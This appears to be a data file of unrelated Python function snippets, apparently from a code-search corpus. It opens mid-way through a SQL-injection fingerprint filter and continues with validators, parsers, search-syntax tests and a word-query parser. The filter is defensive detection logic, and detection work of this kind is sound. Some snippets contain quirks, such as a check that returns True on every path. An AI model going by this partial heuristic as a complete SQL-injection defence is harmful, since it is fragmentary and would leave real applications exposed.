Tsn is ok\n if s.find('T') != -1 and s.find('T') < s.find('sn'):\n return True\n return False\n\n # select foo (as) bar is only nn type i know\n if 'nn' in s and 'Enn' not in s and ';T' not in s:\n return False\n\n if ',o' in s:\n return False\n\n if 'kk' in s and 'Tkk' not in s:\n return False\n\n if 'ss' in s:\n return False\n\n if 'ff' in s:\n return False\n\n if '1no' in s:\n return False\n\n if 'kno' in s:\n return False\n\n if 'nEk' in s:\n return False\n\n if 'n(n' in s:\n return False\n if '1so' in s:\n return False\n if '1s1' in s:\n return False\n if 'noo' in s:\n return False\n if 'ooo' in s:\n return False\n\n if 'vvv' in s:\n return False\n\n if '1vn' in s:\n return False\n if '1n1' in s:\n return False\n if '&1n' in s:\n return False\n if '&1v' in s:\n return False\n if '&1s' in s:\n return False\n if 'nnk' in s:\n return False\n if 'n1f' in s:\n return False\n # folded away\n if s.startswith('('):\n return False\n\n if '&o' in s:\n return False\n\n if '1,1' in s:\n return False\n if '1,s' in s:\n return False\n if '1,n' in s:\n return False\n if 's,1' in s:\n return False\n if 's,s' in s:\n return False\n if 's,n' in s:\n return False\n if 'n,1' in s:\n return False\n if 'n,s' in s:\n return False\n if 'n,n' in s:\n return False\n if '1o1' in s:\n return False\n if '1on' in s:\n return False\n if 'no1' in s:\n return False\n if 'non' in s:\n return False\n if '1(v' in s:\n return False\n if '1(n' in s:\n return False\n if '1(s' in s:\n return False\n if '1(1' in s:\n return False\n if 's(s' in s:\n return False\n if 's(n' in s:\n return False\n if 's(1' in s:\n return False\n if 's(v' in s:\n return False\n if 'v(s' in s:\n return False\n if 'v(n' in s:\n return False\n if 'v(1' in s:\n return False\n if 'v(v' in s:\n return False\n\n if s.startswith('n('):\n return False\n\n if s.startswith('vs'):\n return False\n\n if s.startswith('o'):\n return False\n\n if ')(' in s:\n return False\n\n # need to investigate T(vv) to see\n # if it's correct\n if 'vv' in s and s != 'T(vv)':\n return False\n\n # unlikely to be sqli but case FP\n if s in ('so1n)', 'sonoE'):\n return False\n\n return True", "def match(self, data_instance: Dict[str, Any]) -> bool:", "def validate_format(self):\n return all(\n [\n self.validate_header_keyword(),\n self.validate_type_keyword(),\n self.validate_type_annotations(),\n self.validate_unique_header(),\n self.validate_against_header_count(),\n ]\n )", "def _run_parse_checks(cls, line, filepath, logger=None):\n\n check_funcs = [\n cls.check_column_count,\n cls.check_date_column,\n cls.check_amount_column,\n ]\n checks = [partial(check, line) for check in check_funcs]\n is_parsable = all((check() for check in checks)) # NB short circuit\n logger = logger or logging.getLogger(cls.__name__)\n logger.debug(\"can %s parse this file? 
%s, %s\" %\n (cls.__name__, \"true\" if is_parsable else \"false\", filepath))\n return is_parsable", "def is_valid_para(self, para_type, type_table):\n # The values of the table contain all known destination types\n if para_type in type_table.values():\n return True\n return True", "def _check_alet_dict(text: str, text_type: str, alet_dict: dict, last_nouns: list) -> (list, str):\n agent_match = [] # Match of text and type\n agent_text_match = [] # Match of text only, not type\n loc_text_match = []\n event_text_match = []\n if not text_type or 'PERSON' in text_type or text_type.endswith('ORG') or \\\n text_type.endswith('GPE') or text_type.endswith('NORP') or text_type.endswith('NOUN'):\n agent_arrays = alet_dict['agents'] if 'agents' in alet_dict else []\n for agent_array in agent_arrays:\n alt_names = agent_array[0]\n agent_type = agent_array[1]\n if text not in personal_pronouns and text in alt_names:\n if text_type and (text_type in agent_type or agent_type in text_type):\n agent_match.append((agent_type, agent_array[2])) # index 2 holds the IRI\n break\n else:\n agent_text_match.append((agent_type, agent_array[2]))\n if not text_type or 'LOC' in text_type or 'GPE' in text_type or 'FAC' in text_type or 'NOUN' in text_type:\n loc_arrays = alet_dict['locs'] if 'locs' in alet_dict else []\n for loc_array in loc_arrays:\n alt_names = loc_array[0]\n loc_map = loc_array[1]\n if text in alt_names:\n loc_text_match.append((loc_map, loc_array[2])) # index 2 holds the IRI\n if not text_type or 'EVENT' in text_type or 'NOUN' in text_type:\n event_arrays = alet_dict['events'] if 'events' in alet_dict else []\n for event_array in event_arrays:\n alt_names = event_array[0]\n if text in alt_names:\n # event_array[1] holds the class mappings and [2] holds the IRI\n event_text_match.append((event_array[1], event_array[2]))\n return (_update_last_nouns(text, agent_match[-1][0], agent_match[-1][1], [get_agent_or_loc_class(text_type)],\n last_nouns) if agent_match\n else (_update_last_nouns(text, agent_text_match[-1][0], agent_text_match[-1][1],\n [get_agent_or_loc_class(text_type)], last_nouns) if agent_text_match\n else (_update_last_nouns(text, text_type, loc_text_match[-1][1], loc_text_match[-1][0], last_nouns)\n if loc_text_match\n else (_update_last_nouns(text, text_type, event_text_match[-1][1], event_text_match[-1][0],\n last_nouns) if event_text_match else [], empty_string))))", "def VerifyStructure(self, parser_mediator, lines):\n match_generator = self._LINE_GRAMMAR.scanString(lines, maxMatches=1)\n return bool(list(match_generator))", "def process_mango(self):\n to_ret = False\n curr_parser = MangoParser()\n all_mango_types = curr_parser.Parse(self.target_mango_file, self.target_engine, self.target_blender_factory)\n if len(all_mango_types) > 0:\n to_ret = True\n return to_ret", "def match_list(column, patterns):\n for pattern in patterns:\n if pattern.match(column):\n return True\n return False", "def test_syntax_converter_expand_search_patterns_multiple(self):\n spi_search = \"find t bob sam and k couch\"\n inv_search = \"title:bob and title:sam and keyword:couch\"\n self._compare_searches(inv_search, spi_search)", "def _is_valid_pt(content_type: str) -> bool:\n content_type = content_type.strip()\n return content_type in SPECIFICATION_PRIMITIVE_TYPES", "def _match_entry_type_string(code_entry, string_list):\n entry_type = re.match(r\"<(AST.*):.*\", code_entry.get('type')).group(1)\n return bool(entry_type in string_list)", "def test_match(self, url, criterions=[], har=None):\r\n return 
len(self.get_matches(url, criterions, har)) != 0", "def test_search_multiresults(self):\n self.assertEquals(len(self.t['Scrubs'].search('my first')) >= 3, True)", "def matchLongestRE(stream,tokens):\n kind = None; block = ''\n for k,r in tokenTypes:\n m = r.match(stream.text)\n if m:\n g = m.group()\n #sys.stderr.write('%s: %s'%(k,g))\n if len(g) > len(block):\n kind = k\n block = g\n if kind:\n if not isSkipType(kind):\n if kind == '_keyword':\n token = Token(block)\n else:\n token = Token(kind,attr=block)\n token.setRowCol(stream.row, stream.col)\n tokens.append(token)\n stream.consumeChars(len(block))\n return True\n else:\n return False", "def test_combine_multiple_or(self):\n inv_search = 'author:\"ellis, j*\" and (title:report or keyword:\"cross section\")'\n spi_search = 'find a j ellis and (t report or k \"cross section\")'\n self._compare_searches(inv_search, spi_search)", "def test_type_arg(self, parse_input):\n with pytest.warns(SyntaxWarning, match=\"Only keyword options of the form\"):\n parse_input(\"name testname\\nversion 1.0\\ntarget example (6)\\ntype example (42)\")", "def _lineage_eval_text_match_rules(rules, text):\n\n for rule in rules:\n if TextMatch.dict_call(rule['test'], text, rule['expression']):\n return True\n return False", "def is_select_multiple(self) -> bool:\n select_multiple_starts = (\n 'select_multiple ',\n 'select_multiple_external ',\n )\n row_type = self.get_type()\n return any(row_type.startswith(item) for item in select_multiple_starts)", "def check_range(self, csvop, mtype, stype, flavor, pt, eta, discr):\n allowed_range = self.allowed[(csvop, mtype, stype, flavor)]\n\n eta = abs(eta)\n allowed = all([\n eta >= allowed_range['etaMin'], eta <= allowed_range['etaMax'],\n pt >= allowed_range['ptMin'], pt <= allowed_range['ptMax'],\n discr >= allowed_range['discrMin'], discr <= allowed_range['discrMax'],\n ])\n\n if not allowed and self.verbose>2:\n print 'pt %6.1f <? %6.1f <? %6.1f' % (allowed_range['ptMin'], pt, allowed_range['ptMax'])\n print 'eta %4.1f <? %4.1f <? %4.1f' % (allowed_range['etaMin'], eta, allowed_range['etaMax'])\n print 'discr %4.1f <? %4.1f <? %4.1f' % (allowed_range['discrMin'], discr, allowed_range['discrMax'])\n\n return allowed", "def is_valid_index (wordsearch, line_num, col_num):\n if ((line_num >= 0) and (line_num < len(wordsearch))):\n if ((col_num >= 0) and (col_num < len(wordsearch[line_num]))):\n return True\n return False", "def validate_type_annotations(self):\n valid = False\n invalid_types = []\n # skipping the TYPE keyword, iterate through the types\n # collecting invalid type annotations in list annots\n for t in self.annot_types[1:]:\n if t.lower() not in (\"group\", \"numeric\"):\n # if the value is a blank space, store a higher visibility\n # string for error reporting\n if \"Unnamed\" in t:\n invalid_types.append(\"<empty value>\")\n # Duplicated metadata header name causes type annotation issue.\n # Side effect of Pandas adding a suffix to uniquefy the header.\n # These invalid annotations should not be included in invalid\n # type annotation count. 
This exception may cause miscount of\n # type annot errors if user-supplied annotation has period.\n elif \".\" in t:\n pass\n else:\n invalid_types.append(t)\n if invalid_types:\n msg = 'TYPE row annotations should be \"group\" or \"numeric\"'\n self.store_validation_issue(\n \"error\",\n msg,\n \"format:cap:group-or-numeric\",\n associated_info=invalid_types,\n )\n else:\n valid = True\n return valid", "def check_span_indexes(row, print_mismatch=False):\n\n span1 = \"\"\n span2 = \"\"\n signal = \"\"\n\n try:\n for arg in row[\"idx\"][\"span1\"]:\n span1 += row[\"context\"][arg[0]:arg[1]] + \" \"\n\n for arg in row[\"idx\"][\"span2\"]:\n span2 += row[\"context\"][arg[0]:arg[1]] + \" \"\n\n for sig in row[\"idx\"][\"signal\"]:\n signal += row[\"context\"][sig[0]:sig[1]] + \" \"\n\n flags = {'s1': False, 's2': False, 'sig': False, 'context': False}\n if span1.strip() != (\" \".join(row[\"span1\"])).strip():\n if print_mismatch:\n print(\"span1: [{}]\\n[{}]\".format(span1, (\" \".join(row[\"span1\"])).strip()))\n flags[\"s1\"] = True\n if span2.strip() != (\" \".join(row[\"span2\"])).strip():\n if print_mismatch:\n print(\"span2: [{}]\\n[{}]\".format(span2, (\" \".join(row[\"span2\"])).strip()))\n flags[\"s2\"] = True\n if signal.strip() != (\" \".join(row[\"signal\"])).strip():\n if print_mismatch:\n print(\"signal: [{}]\\n[{}]\".format(signal, (\" \".join(row[\"signal\"])).strip()))\n flags[\"sig\"] = True\n if str(row[\"context\"]) == \"nan\":\n flags[\"context\"] = True\n if any(a for a in flags.values()):\n if print_mismatch:\n print(\"context: [{}] \\n========\".format(row[\"context\"]))\n return False\n except Exception as e:\n return False\n return True", "def is_valid_posse(posse: 'Tuple'):\n # todo: write this as iterator through test types\n # could use test types as blocks for lambda calculus\n # for test in attribute tests:\n\n # print('testing posse: %s' % str(posse))\n\n prefixes = set()\n cases = set()\n lengths = set()\n letters = set()\n\n for member in posse:\n # prefix validity\n prefixes.add(member[0])\n\n # case validity\n if ord(member[1]) in THIRD_CASE:\n cases.add(2)\n elif member[1].isupper():\n cases.add(1)\n else:\n cases.add(0)\n\n # length validity\n lengths.add(len(member[1:]))\n\n # letter validity\n # print('letter validity for %s' % member)\n for letter_type in LETTER_SETS:\n if ord(member[1]) in LETTER_SETS[letter_type]:\n letters.add(letter_type)\n\n prefix_is_valid = len(prefixes) == 1 or len(prefixes) == 3\n case_is_valid = len(cases) == 1 or len(cases) == 3\n length_is_valid = len(lengths) == 1 or len(lengths) == 3\n letter_is_valid = len(letters) == 1 or len(letters) == 3\n\n # print('prefix_is_valid: %s' % prefix_is_valid)\n # print('case_is_valid: %s' % case_is_valid)\n # print('length_is_valid: %s' % length_is_valid)\n # print('letter_is_valid: %s' % letter_is_valid)\n\n return all((prefix_is_valid,\n case_is_valid,\n length_is_valid,\n letter_is_valid))", "def _can_handle_query(cls, *query):\n chkattr = [\"Time\", \"Instrument\", \"SatelliteNumber\"]\n chklist = [x.__class__.__name__ in chkattr for x in query]\n for x in query:\n if x.__class__.__name__ == \"Instrument\" and x.value.lower() in (\n \"xrs\",\n \"goes\",\n ):\n return all(chklist)\n return False", "def has_match_variables(self, response):\n return response.find(' wildcards: (') != -1", "def job_posting_matches(self, job_title_posting, html_posting):\n regex_keyword_title = re.compile(r'\\b(data|machine learning)\\b', flags=re.IGNORECASE)\n regex_bad_position_title = 
re.compile(r'\\b(manager|principal|professor|director|lead)\\b', flags=re.IGNORECASE)\n\n job_posting = BeautifulSoup(html_posting, 'html.parser').get_text()\n regex_language_posting = re.compile(r'python', flags=re.IGNORECASE)\n\n return regex_keyword_title.search(job_title_posting) and \\\n not regex_bad_position_title.search(job_title_posting) and \\\n regex_language_posting.search(job_posting)", "def _block_matches_all(block_json):\r\n # do the checks which don't require loading any additional data\r\n if (\r\n self._block_matches(block_json, kwargs) and\r\n self._block_matches(block_json.get('fields', {}), settings)\r\n ):\r\n if content:\r\n definition_block = self.db_connection.get_definition(block_json['definition'])\r\n return self._block_matches(definition_block.get('fields', {}), content)\r\n else:\r\n return True", "def _arguments_valid(self) -> bool:\n return self.find and self.near and self.max_results >= 1", "def isValidSearchQuery(self, searchQuery):\n if len(searchQuery) != 4:\n return False\n validSearchQueries = [[\"search\", \"client\", \"name\"],\n [\"search\", \"movie\", \"title\"],\n [\"search\", \"movie\", \"description\"],\n [\"search\", \"movie\", \"genre\"]]\n isValidQuery = False\n for query in validSearchQueries:\n if query[0] == searchQuery[0] and query[1] == searchQuery[1] and query[2] == searchQuery[2]:\n isValidQuery = True\n return isValidQuery", "def check_inputs(self, inputs):\n if self.debug:\n print(\"Checking inputs\")\n result = True\n for _input in inputs:\n if \"word_\" in _input and inputs[_input] == \"\":\n result = False\n elif \"idiom_\" in _input and inputs[_input] == \"\":\n if \"list\" not in _input:\n result = False\n return result", "def check_param(self, param_str):\n param_groups = None\n \"\"\" Initial param cosmetic adjustment \"\"\"\n param_str = param_str.strip()\n\n \"\"\" Cherck the param syntax \"\"\"\n for key, pattern in self.patterns.items():\n param_groups = re.fullmatch(pattern, param_str)\n if param_groups:\n return True\n return False", "def check_param(self, param_str):\n param_groups = None\n \"\"\" Initial param cosmetic adjustment \"\"\"\n param_str = param_str.strip()\n\n \"\"\" Cherck the param syntax \"\"\"\n for key, pattern in self.patterns.items():\n param_groups = re.fullmatch(pattern, param_str)\n if param_groups:\n return True\n return False", "def w_is_typed(tokens):\n return (\n 'type' in tokens or\n 'answerblock' in tokens or\n 'drawbox' in tokens or\n 'answerfigure' in tokens\n )", "def _can_handle_query(cls, *query):\n # Import here to prevent circular imports\n from sunpy.net import attrs as a\n\n required = {a.Time, a.Instrument}\n optional = {a.Wavelength, a.Level, a.goes.SatelliteNumber}\n all_attrs = {type(x) for x in query}\n\n ops = all_attrs - required\n # check to ensure that all optional requirements are in approved list\n if ops and not all(elem in optional for elem in ops):\n return False\n\n # if we get this far we have either Instrument and Time\n # or Instrument, Time and Wavelength\n check_var_count = 0\n for x in query:\n if isinstance(x, a.Instrument) and x.value.lower() == 'suvi':\n check_var_count += 1\n\n if check_var_count == 1:\n return True\n else:\n return False", "def is_multiquery(corpus, search, query, just_speakers):\n is_mul = False\n from collections import OrderedDict\n #if hasattr(corpus, '__iter__'):\n # is_mul = True\n # so we can do search = 't', query = ['NP', 'VP']:\n from corpkit.dictionaries.process_types import Wordlist\n if isinstance(query, Wordlist):\n query = 
list(query)\n if isinstance(query, list):\n if query != list(search.values())[0] or len(list(search.keys())) > 1:\n query = {c.title(): c for c in query}\n if isinstance(query, (dict, OrderedDict)):\n is_mul = True\n if just_speakers:\n if just_speakers == 'each':\n is_mul = True\n just_speakers = ['each']\n if just_speakers == ['each']:\n is_mul = True\n elif isinstance(just_speakers, STRINGTYPE):\n is_mul = False\n just_speakers = [just_speakers]\n #import re\n #if isinstance(just_speakers, re._pattern_type):\n # is_mul = False\n if isinstance(just_speakers, list):\n if len(just_speakers) > 1:\n is_mul = True\n if isinstance(search, dict):\n if all(isinstance(i, dict) for i in list(search.values())):\n is_mul = True\n return is_mul, corpus, search, query, just_speakers", "def parse(args, query):\n\n global query_type\n\n # Deal first with requests for definition or pronunciation\n # 1. Make the code easier to read\n first_word = args[0]\n second_word = args[1] if len(args) > 1 else \"\"\n third_word = args[2] if len(args) > 2 else \"\"\n fourth_word = args[3] if len(args) > 3 else \"\"\n # we use the teranary operator (this if ____ else that) to avoid an IndexError\n # IndexError would be raised if we tried to access the second element (args[1])\n # in a list which contained only one item (eg args == [\"lonely\"])\n # the teranary operator (in most languages it looks like \"____ ? this : that\")\n # returns \"this\" when the if is true and \"that\" when the if is false\n # meaning, if len(args) is NOT greater than 1, second_word == \"\"\n\n # 2. Check for keywords in the list of arguments\n # Example: nostrum defined\n # Example: pronunciation of otolaryngology\n if first_word == \"define\":\n # e.g. if the first word is \"define\" we'll add the second word to the query\n query = {\"sp\": second_word, \"md\": \"d\", \"max\": \"1\", \"qe\": \"sp\", \"ipa\": \"1\"}\n # the query is a dictionary of GET parameters for the http request, eg\n # https://api.datamuse.com/words?max=1&sp=SECOND_WORD_HERE&qe=sp&md=d&ipa=1\n elif second_word == \"defined\" or second_word == \"definition\":\n query = {\"sp\": first_word, \"md\": \"d\", \"max\": \"1\", \"qe\": \"sp\", \"ipa\": \"1\"}\n # this one uses string interpolation (the f\"\" stuff)\n elif f\"{second_word} {third_word}\" == \"means what\":\n query = {\"sp\": first_word, \"md\": \"d\", \"max\": \"1\", \"qe\": \"sp\", \"ipa\": \"1\"}\n elif f\"{second_word} {third_word} {fourth_word}\" == \"is said how\":\n query = {\"sp\": first_word, \"md\": \"r\", \"max\": \"1\", \"qe\": \"sp\", \"ipa\": \"1\"}\n # this one uses regular expressions -- i.e. 
if the second_word is \"of\" or \"for\"\n elif first_word == \"definition\" and re.match(r'(of)|(for)',second_word):\n query = {\"sp\": third_word, \"md\": \"d\", \"max\": \"1\", \"qe\": \"sp\", \"ipa\": \"1\"}\n # the is_pronounced function returns true if first_word is a (mis)spelling of pronounced\n elif re.match(r'(of)|(for)',second_word) and is_pronounced(first_word):\n query = {\"sp\": third_word, \"md\": \"r\", \"max\": \"1\", \"qe\": \"sp\", \"ipa\": \"1\"}\n # the ordering in the above list is not entirely random\n # since an if-elif-else statement won't keep evaluating after it finds a match\n # it makes sense to put the most computationally complex clauses at the end\n # >>> import timeit\n # >>> timeit.timeit('from word_helpers import is_pronounced; is_pronounced(\"pronounced\")', number=10000)\n # 0.022870146989589557\n # >>> timeit.timeit('args = [\"defined\"]; args[0] == \"defined\"', number=10000)\n # 0.002359684993280098\n # it takes 2 milliseconds to compare a string in a list 10,000 times\n # -- versus 2 centiseconds to run is_pronounced 10,000 times\n # (on my Intel Core i5 2.67GHz CPU -- obviously speed depends on the processor)\n # it's also worth noting that readability counts more than speed optimization (most of the time!)\n\n # Quick way to check if any of the above if statements matched\n if \"sp\" in query:\n # if so, we are done in this function\n if query[\"md\"] == \"r\": query_type = \"PRO\"\n if query[\"md\"] == \"d\": query_type = \"DEF\"\n return query\n\n # these will be useful later\n STOP_WORDS = (\"and\", \"meaning\", \"means\", \"max\", \"about\", \"which\", \"that\")\n\n # Parse more complicated requests for synonyms, etc\n # 0 is false in python, so this loop will run until we've removed all the args\n while len(args):\n # we must reset these vars each time the loop starts\n # in case we've deleted items from the args list\n first_word = args[0]\n second_word = args[1] if len(args) > 1 else \"\"\n third_word = args[2] if len(args) > 2 else \"\"\n # we use the teranary operator (this if ____ else that) to avoid an IndexError\n # IndexError would be raised if we tried to access the second element (args[1])\n # in a list which contained only one item (eg args == [\"lonely\"])\n # the teranary operator (in most languages it looks like \"____ ? this : that\")\n # returns \"this\" when the if is true and \"that\" when the if is false\n # meaning, if len(args) is NOT greater than 1, second_word == \"\"\n\n # Disambiguate homonym requests from spelling correction requests\n # Example: sounding like tung\n # Example: sounds like doe but spelled differently\n if re.match(r'sound((s)|(ing)) like',f\"{first_word} {second_word}\"):\n\n # again, use len(args) to avoid an IndexError\n if len(args) >= 6 and \\\n re.match(r'((but)|(except)) spelled different(ly)?',f\"{args[3]} {args[4]} {args[5]}\"):\n # but instead of teranary operator,\n # use \"short circuit logic\" -- when python sees \"if __A__ and __B__ \",\n # it knows that if A is false, the whole thing will be false\n # (you can't have \"ice cream and potatoes\" for dinner if you don't have ice cream)\n # and it won't waste time evaluating B, so re.match won't run and args[4]\n # won't be accessed and no IndexError will be raised, yay!\n # regex explained: ? means the prior thing matched zero or one times\n # different(ly)? 
matches \"different\" and \"differently\"\n query[\"rel_hom\"] = third_word\n # now, delete 6 items from args, starting at item 0\n del args[0:6]\n else:\n query[\"sl\"] = third_word\n del args[0:3]\n\n # Example: spelled like 'cens?r'\n elif re.match(r'spell((ed)|(ing)) like',f\"{first_word} {second_word}\"):\n # two stars (**) means \"unpack\" a dictionary\n # just like unpacking a suitcase, we've dumped the old contents of query\n # into a new dictionary (which we are saving with the same variable name!)\n query = {**query,\"sp\": third_word}\n # query[\"sp\"] = third_word also works fine\n # just showing off how to combine two dictionaries :)\n del args[0:3]\n\n # Example: rhymes with culminate\n elif len(args) > 2 and second_word == \"with\" and is_rhymes(first_word):\n query[\"rel_rhy\"] = third_word\n del args[0:3]\n\n # Example: almost rhymes with culminate\n elif len(args) > 3 and \\\n f\"{first_word} {third_word}\" == \"almost with\" and \\\n is_rhymes(second_word):\n query[\"rel_nry\"] = args[3] # fourth_word\n del args[0:4]\n\n # Example: comes after sea\n elif f\"{first_word} {second_word}\" == \"comes after\":\n query[\"lc\"] = third_word\n del args[0:3]\n elif first_word == \"follows\":\n query[\"lc\"] = second_word\n del args[0:2]\n elif f\"{first_word} {second_word}\" == \"comes before\":\n query[\"rc\"] = third_word\n del args[0:3]\n elif first_word == \"preceeds\":\n query[\"rc\"] = second_word\n del args[0:2]\n\n # Example: describes paint\n elif first_word == \"describes\":\n query[\"rel_jjb\"] = second_word\n del args[0:2]\n\n # Example: associated with feet\n elif f\"{first_word} {second_word}\" == \"associated with\" or \\\n f\"{first_word} {second_word}\" == \"triggered by\":\n query[\"rel_trg\"] = third_word\n del args[0:3]\n\n # Example: meaning feeling tired\n elif first_word in [\"means\",\"meaning\",\"like\"]:\n # get rid of first_word\n del args[0]\n # now short circuit logic again, plus using the tuple from ealier\n # b/c if we have \"meaning deer and sounds like roe\" we don't want\n # query[\"ml\"] == \"deer and sounds like roe\" -- it should be just \"deer\"\n while len(args) and args[0] not in STOP_WORDS:\n # teranary operator prevents KeyError if \"ml\" not already in query dictionary\n query[\"ml\"] = f\"{query['ml']} {args[0]}\" if \"ml\" in query else args[0]\n del args[0]\n # an example with the previous code to make things clearer\n # say args == [\"means\", \"egg\", \"beater\", \"and\", \"max\", \"35\"]\n # first_word IS in [\"means\",\"meaning\",\"like\"]\n # del first_word, args is now [\"egg\", \"beater\", \"and\", \"max\", \"35\"]\n # len(args) == 5, args[0] is NOT in STOP_WORDS\n # \"ml\" is NOT in query, so teranary returns args[0] (\"egg\")\n # args[0] is copied to query[\"ml\"] (query is now {ml: \"egg\"})\n # del args[0], args is now [\"beater\", \"and\", \"max\", \"35\"]\n # return to top of while loop, len(args) == 4, args[0] is NOT in STOP_WORDS\n # \"ml\" IS in query, so teranary returns f\"{query['ml']} {args[0]}\" (\"egg beater\") \n # f\"{query['ml']} {args[0]}\" is copied to query[\"ml\"]\n # (query is now {ml: \"egg beater\"})\n # del args[0], args is now [\"and\", \"max\", \"35\"]\n # return to top of while loop, len(args) == 3,\n # args[0] IS in STOP_WORDS (args[0] == \"and\")\n # DO NOT enter the while loop, continue past this code block\n\n # Discover the topic of our query\n elif first_word == \"about\":\n del args[0]\n count = 0\n # Datamuse allows a max of five topic words\n while len(args) and args[0] not in STOP_WORDS 
and count <= 5:\n query[\"topics\"] = f\"{query['topics']} {args[0]}\" if \"topics\" in query else args[0]\n del args[0]\n # count += 1 is the same as count = count + 1\n count += 1\n\n # How many results to return (max 1000)\n elif first_word in [\"max\", \"maximum\", \"only\"]:\n user_max = convert_num(second_word)\n if user_max and int(user_max) <= 1000:\n query[\"max\"] = user_max\n del args[0:2]\n\n # Remove filler words if they weren't parsed out above\n elif first_word in [\"that\",\"which\",\"and\",\"like\",\"is\"]:\n del args[0]\n\n # Add anything not otherwise parsable to the ml parameter\n else:\n query[\"ml\"] = f\"{query['ml']} {first_word}\" if \"ml\" in query else first_word\n del args[0]\n\n # this is the bottom of that massive while loop\n # if args is not empty by now, we'll start over from the top ^\n\n return query\n # and this is the end of the \"def parse(args, query)\" function\n # whew!", "def chatscriptMatch(self, args, f_type):\n\n try:\n pattern = self.bot.resolve_arg(args[0], f_type)\n except IndexError:\n raise BBotException({'code': 190, 'function': 'chatscriptMatch', 'arg': 0, 'message': 'Pattern in arg 0 is missing.'})\n\n try:\n input_text = self.bot.resolve_arg(args[1], f_type)\n except IndexError:\n raise BBotException({'code': 191, 'function': 'chatscriptMatch', 'arg': 1, 'message': 'Text in arg 1 is missing.'})\n\n try:\n entities_var_names = self.bot.resolve_arg(args[2], f_type)\n except IndexError:\n entities_var_names = [] # entities are optional\n\n result = False\n if len(input_text) > 0:\n # clear match variables first (ChatScript does not reset them when running testpattern)\n self.send(':do ^clearmatch()')\n # test the pattern\n cs_req = f\":testpattern ({pattern}) {input_text}\" #@TODO try sending direct text and running ^match later (it's faster. 
sends input text once)\n self.logger.debug(\"ChatScript request: \" + cs_req)\n cs_res = self.send(cs_req)\n self.logger.debug('ChatScript response: \\n' + str(cs_res))\n\n if not self.has_error(cs_res):\n result = self.is_match(cs_res)\n if result:\n self.logger.info('It\\'s a match!')\n else:\n self.logger.info('No match')\n # check if there are match variables set\n if self.has_match_variables(cs_res):\n self.store_variables_from_matched_variables(entities_var_names)\n else:\n self.logger.warning('Response returned with error')\n\n return result", "def check(self, text):\n lt = s = n = 0\n result = False\n for g in text:\n if g in LETTERS and lt < self.letters:\n lt += 1\n if g in NUMBERS and n < self.numbers:\n n += 1\n if g in SYMBOLS and s < self.symbols:\n s += 1\n if n == self.numbers and s == self.symbols and lt == self.letters:\n result = True\n break\n return result", "def parsePosition(self, parse):\n\n if len(parse) == 2:\n ch1 = ord(parse[0].lower())\n ch2 = ord(parse[1].lower())\n\n maxNum = 48 + self.board.size # ascii of max row #\n\n # [Row#][ColLetter]] case\n if 48 < ch1 <= maxNum and 97 <= ch2 < (97 + self.board.size):\n return maxNum - ch1, ch2 - 97 # actual grid indexes of desired position\n\n # [ColLetter][Row#] case\n if 48 < ch2 <= maxNum and 97 <= ch1 < (97 + self.board.size):\n return maxNum - ch2, ch1 - 97 # actual grid indexes of desired position\n return False", "def match_rules(rules, app, action):\n for rule in rules.split(','):\n rule_app, rule_action = rule.split(':')\n if rule_app == '*' or rule_app == app:\n if rule_action == '*' or rule_action == action or action == '%':\n return True\n return False", "def contains_match(self, regexp):\n # If the regexp is not found, find will return a tuple (-1, -1) in Sublime 3 or None in Sublime 2 \n # https://github.com/SublimeTextIssues/Core/issues/534\n contains_import = self.view.find(regexp, 0)\n return contains_import.size() > 0 if float(sublime.version()) >= 3000 else contains_import is not None", "def no_or_clauses (self,phrase):\r\n \r\n for x in phrase:\r\n if isinstance(x,list) and x[0] == '@':\r\n return False\r\n return True", "def matches(self):\n return False", "def match_skills(item):\n\n text = item.text\n if any([skill in text for skill in skill_names]):\n return True\n return False", "def in_range(self, index):\n for match in self.matches:\n if match.start_pos <= index < match.end_pos:\n return True\n\n return False", "def test_syntax_converter_expand_search_patterns_multiple_conjoined(self):\n spi_search = \"find t bob sam and couch\"\n inv_search = \"title:bob and title:sam and title:couch\"\n self._compare_searches(inv_search, spi_search)", "def test_match_types(self):\n f = lws.match_types\n # assert f(str, u'test') is True\n assert f(str, 'test') is True\n assert f(int, 123) is True\n assert f(int, 123.00) is False\n assert f(bool, [1, 2, 3]) is False", "def type_restrictions(data):\n\n exam_type = [\"main\", \"MAIN\", \"CAT\", \"cat\"]\n if data not in exam_type:\n return False\n return True", "def _match(self, rule, obj):\n\n for key in rule:\n if key == '$and':\n if not self.handle_and(key, rule[key], obj):\n return False\n\n elif key == '$or':\n if not self.handle_or(key, rule[key], obj):\n return False\n\n elif key == '$nor':\n if not self.handle_nor(key, rule[key], obj):\n return False\n\n elif not self.handle_field(key, rule[key], obj):\n return False\n\n return True", "def validate_type_keyword(self):\n valid = False\n if self.annot_types[0].upper() == \"TYPE\":\n valid = True\n if 
self.annot_types[0] != \"TYPE\":\n msg = f'File keyword \"TYPE\" provided as {self.annot_types[0]}'\n self.store_validation_issue(\"warn\", msg, \"format:cap:type\")\n else:\n msg = \"Malformed TYPE row, missing TYPE. (Case Sensitive)\"\n self.store_validation_issue(\"error\", msg, \"format:cap:type\")\n return valid", "def _match(self, key, attributes=None, context=None):\n matching_data = Sanitizer.ensure_int(self._get_matcher_input(key, attributes))\n if matching_data is None:\n return False\n return self._lower <= self.input_parsers[self._data_type](matching_data) <= self._upper", "def match(self, sentence) -> bool:\r\n if (any(word[0] in sentence.lower() for word in self.word_list if word[1] == \"partial\") or any(\r\n word[0].lower() == sentence.lower() for word in self.word_list if word[1] == \"full\")) and not any(\r\n word[0] in sentence.lower() for word in self.word_list if word[1] == \"not\"):\r\n return True\r\n else:\r\n return False", "def __checkcolumns(self, lista: List[str]) -> True:\r\n\r\n if isinstance(lista, list) is False:\r\n raise TypeError(f\"{lista} has to be a list.\")\r\n if len(lista) != 10:\r\n raise ValueError(f\"{lista} must have 10 columns\")\r\n\r\n errorlista = []\r\n\r\n # Regarding 'self.tiposDisponiveis',\r\n # Layer and Marked happens on the same column.\r\n # if there is 'layer', 'marked' won't show up, and viceversa.\r\n # Therefore 'self.tiposDisponiveis' is a list with 11 elements. While 'lista' is a list with 10 elements.\r\n\r\n for _ in lista:\r\n # searching for 'Layer'\r\n if self.tiposDisponiveis[0].lower() == _.lower():\r\n break\r\n else:\r\n # if 'Layer' wasn't found, searching for 'Marked'\r\n for _ in lista:\r\n if self.tiposDisponiveis[1].lower() == _.lower():\r\n break\r\n else:\r\n # If none of the two are present on the line, add to the error list\r\n errorlista.append(\"Layer Or Marked\")\r\n \r\n # repeat the search for all the remaining required values\"\"\"\r\n for _ in range(2, len(self.tiposDisponiveis)-1):\r\n for x in lista:\r\n if x.lower() == self.tiposDisponiveis[_].lower():\r\n break\r\n 